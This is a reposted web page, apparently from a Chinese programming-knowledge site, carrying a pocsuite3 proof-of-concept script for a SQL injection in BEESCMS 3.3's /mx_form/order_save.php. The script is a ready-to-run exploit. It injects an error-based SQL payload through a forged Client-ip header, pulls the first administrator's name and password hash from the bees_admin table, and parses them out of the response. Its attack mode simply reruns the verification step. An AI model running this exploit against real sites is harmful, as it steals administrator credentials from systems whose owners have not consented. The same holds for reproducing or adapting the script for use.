登录
当前位置: 首页 > 工具软件 > beescms > 使用案例 >

php 3.2 get order sn,beescms 3.3 /mx_form/order_save.php SQL注入漏洞

狄阳秋
2023-12-01

"""

If you have issues about development, please read:

https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

for more about information, plz visit http://pocsuite.org

"""

from pocsuite3.api import Output, POCBase, register_poc, requests, logger

from pocsuite3.api import get_listener_ip, get_listener_port

from pocsuite3.api import REVERSE_PAYLOAD

from pocsuite3.lib.utils import random_str

from requests.exceptions import ReadTimeout

import re

class DemoPOC(POCBase):

vulID = '1249' # ssvid

version = '1'

author = ['chenghs@knownsec.com']

vulDate = '2014­-04-­12'

createDate = '2014-04-18'

updateDate = '2014-04-18'

references = ['http://www.wooyun.org/bugs/wooyun-2010-055608']

name = 'beescms 3.3 /mx_form/order_save.php SQL注入漏洞 POC'

appPowerLink = 'http://www.beescms.com/'

appName = 'BEESCMS'

appVersion = '3.3#'

vulType = 'SQL Injection'

desc = '''

BEESCMS 3.3 /mx_form/order_save.php文件中

line 59对$ip的检查可以使用大小写绕过,然后在line 63将$ip拼接在SQL语句中

形成SQL注入漏洞

'''

samples = []

install_requires = ['']

def _verify(self):

result = {}

url = self.url + '/mx_form/order_save.php'

headers_fake = {}

headers_fake['Client-ip'] = '127.0.0.1\',(SELECT 1 FROM (SELECT count(1),' \

'concat(round(rand(0)),(SELECT concat(0x71677' \

'66571,0x7c,admin_name,0x3a73706c69743a,admin' \

'_password,0x7c,0x716b616771) FROM bees_admin' \

' LIMIT 0,1))a FROM information_schema.tables' \

' GROUP by a)b))#'

data = 'form_id=5&fields%5Bmail%5D=1&fields%5Busername%5D=1&fields%5Btel%' \

'5D=1&fields%5Bweb_contact%5D=1&fields%5Baddress%5D=1&fields%5Bcon' \

'tent%5D=1&lang=cn&f_id=23&submit=%E6%8F%90%E4%BA%A4'

r = requests.post(url, data=data, headers=headers_fake)

content = r.text

results = re.findall('qgveq\|(.+):split:([a-fA-F0-9]{32})\|qkagq', content)

if results:

result['Database'] = {}

result['Database']['Username'] = results[0][0]

result['Database']['Password'] = results[0][1]

return self.parse_output(result)

def parse_output(self, result):

output = Output(self)

if result:

output.success(result)

else:

output.fail('target is not vulnerable')

return output

def _attack(self):

return self._verify()

def _shell(self):

pass

register_poc(DemoPOC)

 类似资料:

相关阅读

Spring注入ServletMariaDb SQL注入SQLAlchemy + SQL注入C#sqlite注入sql注入之手工注入示例详解

相关文章

Google Guice 可选注入Google Guice 字段注入Google Guice 方法注入安全测试SQL注入具有漏洞的组件

相关问答

在Veracode(CWE 117)中使用slf4j记录器时的CRLF注入漏洞输入流内存泄漏?@注入WebServiceContext字符串输入参数的SSRF CheckMarx漏洞Spring setter注入和构造函数注入

相关文档

论 PHP 常见的漏洞格式化字符串漏洞利用Pandas Cookbook 带注释源码Flask 入门Ansible 入门
快捷导航: 新手教程 算法原理 架构设计 Java进阶 数据库进阶 大厂专栏 面试经验 编程笔记 编程问答 所有专题 文档资料 工具软件 电子书籍 小牛导航
在线工具: 房贷计算器 个税计算器 Linux命令查询 Json格式化 正则表达式 颜色转换 AES加解密 SHA1加密 MD5加密 毒鸡汤 字数统计 随机密码生成 进制转换 Base64编解码 励志句子
Copyright © 2019-2024 小牛知识库@xnip.cn. All Rights Reserved.